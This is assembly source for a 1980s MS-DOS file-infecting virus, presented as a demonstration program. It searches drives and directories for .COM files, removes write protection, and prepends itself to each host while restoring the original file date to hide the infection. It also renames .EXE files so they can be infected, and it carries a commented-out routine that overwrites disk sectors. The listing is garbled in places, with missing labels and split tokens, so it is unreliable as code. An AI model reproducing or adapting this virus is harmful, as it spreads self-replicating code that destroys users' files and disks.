2022-08-21 09:07:57 +00:00
page 70 , 120
; Program Virus Ver.: 1.1
; Copyright by R. Burger 1986
; This is a demonstration program for computer
; viruses. It has the ability to replicate itself,
; and thereby modify other programs
Code Seg ment
Assume CS : Code
progr equ 100h
ORG progr
; The three NOP's serve as the marker byte of the
; virus which will allow it to identify a virus
; Initialize the pointers
mov ax , 00
mov es :[ pointer ], ax
mov es :[ counter ], ax
mov es :[ di sks ], al
; Get the selected drive
mov ah , 19h ; drive?
int 21h
; Get the current path on the current drive
mov cs : drive , al ; save drive
mov ah , 47h ; dir?
mov ah , ah
mov si , si
mov dh , 0
add al , 1
mov dl , dl
nop ;****
mov dl , al
mov dl , dl
nop ;**** ; in actual drive
lea si , cs : old_path
int 21h
; Get the number of drives present.
; If only one drive is present, the pointer for
; search order will be set to search order + 6
mov ah , 0eh ; how many disks
mov dl , 0 ;****????
int 21h
mov al , 01
cmp al , 01 ; one drive?
jnz hups3
mov al , 06
hups3: mov ah , 0
lea bx , search_order
add bx , ax
add bx , 0001h
mov cs : pointer , bx
; Carry is set, if no more .COM's are found.
; Then, to avoid unnecessary work, .EXE files will
; be renamed to .COM file and infected.
; This causes the error message "Program too large
; to fit in memory" when starting larger infected
; EXE programs.
jnc no_name_change
mov ah , 17h ; change exe to com
lea dx , cs : maske_exe
int 21h
cmp al , 0ffh
jnz no_name_change ; .EXE found?
; If neither .COM nor .EXE is found, then sectors will
; be overwritten depending on the system time in
; milliseconds. This is the time of the complete
; "infection" of a storage medium. The virus can find
; nothing more to infect and starts its destruction.
; mov ah,2ch ; read system clock
; int 21h
; mov bx,cs:pointer
; mov al,cs:[bx]
; mov bx,dx
; nop ;****
; mov cx,2
; nop ;****
; mov dh,0
; int 26h ; write crap on disk
db ' RB2 - LiquidCode <tm> '
; Check if the end of the search order table has been
; reached. If so, end.
mov bx , cs : pointer
dec bx
mov cs : pointer , bx
mov dl , cs :[ bx ]
cmp dl , 0ffh
jnz hups2
jmp hops
; Get new drive from search order table and
; select it.
mov ah , 0eh
mov dl , 2 ;***** +
int 21h ; change disk
; Start in the root directory
mov ah , 3bh ; change path
lea dx , path
int 21h
jmp find_first_file
; Starting from the root, search for the first subdir
; First convert all .EXE files to .COM in the old
; directory.
mov ah , 17h ; change exe to com
lea dx , cs : maske_exe
int 21h
mov ah , 3bh ; use root dir
lea dx , path
int 21h
mov ah , 04eh ;Search for first subdirectory
mov cx , 00010001b ; dir mask
lea dx , maske_dir
int 21h
jc ch ange_disk
mov bx , CS : counter
DEC bx
jz use_next_subdir
; Search for the next subdir. If no more directories
; are found, the drive will be changed.
mov ah , 4fh ; search for next subdir
int 21h
jc ch ange_disk
dec bx
jnz find_next_subdir
; Select found directory
mov ah , 2fh ; get dta address
int 21h
add bx , 1ch
mov es :[ bx ], '\ ' ; address of name in dta
inc bx
push ds
mov ax , es
mov ds , ax
mov dx , bx
mov ah , 3bh ; change path
int 21h
pop ds
mov bx , cs : counter
inc bx
mov CS : counter , bx
; Find first .COM file in the current directory.
; If there are non, search the next directory.
mov ah , 04eh ; Search for first
mov cx , 00000001b ; mask
lea dx , maske_com ;
int 21h
jc find_first_subdir
jmp ch eck_if_ill
; If the program is already infected, search for
; the next program.
mov ah , 4fh ; search for next
int 21h
jc find_first_subdir
; Check if already infected by the virus.
mov ah , 3dh ; open channel
mov al , 02h ; read/write
mov dx , 9eh ; address of name in dta
int 21h
mov bx , ax ; save channel
mov ah , 3fh ; read file
mov cx , buflen ;
mov dx , buffer ; write in buffer
int 21h
mov ah , 3eh ; CLOSE FILE
int 21h
; Here we search for three NOP's.
; If present, there is already an infection. We must
; then continue the search.
mov bx , cs :[ buffer ]
cmp bx , 9090h
jz find_next_file
; Bypass MS-DOS write protection if present
mov ah , 43h ; write enable
mov al , 0
mov dx , 9eh ; address of name in dta
int 21h
mov ah , 43h
mov al , 01h
and cx , 11111110b
int 21h
; Open file for write access.
mov ah , 3dh ; open channel
mov al , 02h ; read/write
mov dx , 9eh ; address of name in dta
int 21h
; Read date entry of program and save for future use.
mov bx , ax ; channel
mov ah , 57h ; get date
mov al , 0
int 21h
push cx ; save date
push dx
; The jump located at address 0100h of the program
; will be saved for future use.
mov dx , cs :[ conta ] ; save old jmp
mov cs :[ jmpbuf ], dx
mov dx , cs :[ buffer + 1 ] ; save new jump
lea cx , cont - 100h
sub dx , cx
mov cs :[ conta ], dx
; The virus copies itself to the start of the file
mov ah , 40h ; write virus
mov cx , buflen ; length buffer
lea dx , main ; write virus
int 21h
; Enter the old creation date of the file.
mov ah , 57h ; write date
mov al , 1
pop dx
pop cx ; restore date
int 21h
; Close the file.
mov ah , 3eh ; close file
int 21h
; restore the old jump address.
; The virus saves at address "conta' the jump which
; was at the start of the host program.
; This is done to preserve the executability of the
; host program as much as possible.
; After saving itstill works with the jump address
; contained in the virus. The jump address in the
; virus differs from the jump address in memory
mov dx , cs :[ jmpbuf ] ; restore old jmp
mov cs :[ conta ], dx
hops: nop
call use_old
; Continue with the host program.
cont db 0e9h ; make jump
conta dw 0
mov ah , 00
int 21h
; reactivate the selected drive at the start of the
; program.
mov ah , 0eh ; use old drive
mov dl , cs : drive
int 21h
; Reactivate the selected path at the start of the
; program.
mov ah , 3bh ; use old dir
lea dx , old_path - 1 ; get old path and backslash
int 21h
search_order db 0ffh , 1 , 0 , 2 , 3 , 0ffh , 00 , 0ffh
pointer dw 0000 ; pointer f. search order
counter dw 0000 ; counter f. nth search
disks db 0 ; number of disks
maske_com db "*.com" , 00 ; search for com files
maske_dir db "*" , 00 ; search dir's
maske_exe db 0ffh , 0 , 0 , 0 , 0 , 0 , 00111111b
db 0 , "????????exe" , 0 , 0 , 0 , 0
db 0 , "????????com" , 0
maske_all db 0ffh , 0 , 0 , 0 , 0 , 0 , 00111111b
db 0 , "???????????" , 0 , 0 , 0 , 0
db 0 , "????????com" , 0
buffer equ 0e000h ; a safe place
buflen equ 230h ; length of virus !!!!!!
; careful
; if changing !!!!!!
jmpbuf equ buffer + buflen ; a safe place for jump
path db "\" , 0 ; first path
drive db 0 ; actual drive
back_slash db "\"
old_path db 32 dup ( ? ) ; old path
code ends
end main
; When the program is started, the first COM file in the root
; directory is infected. You can't see any changes to the
; directory entries. But if you look at the hex dump of an
; infected program, you can see the marker, which in this case
; consists of three NOP's (hex 90). WHen the infected program
; is started, the virus will first replicate itself, and then
; try to run the host program. It may run or it may not, but
; it will infect another program. This continues until all
; the COM files are infected. The next time it is run, all
; of the EXE files are changed to COM files so that they can
; be infected. In addition, the manipulation task of the virus
; begins, which consists of the random destruction of disk
; sectors.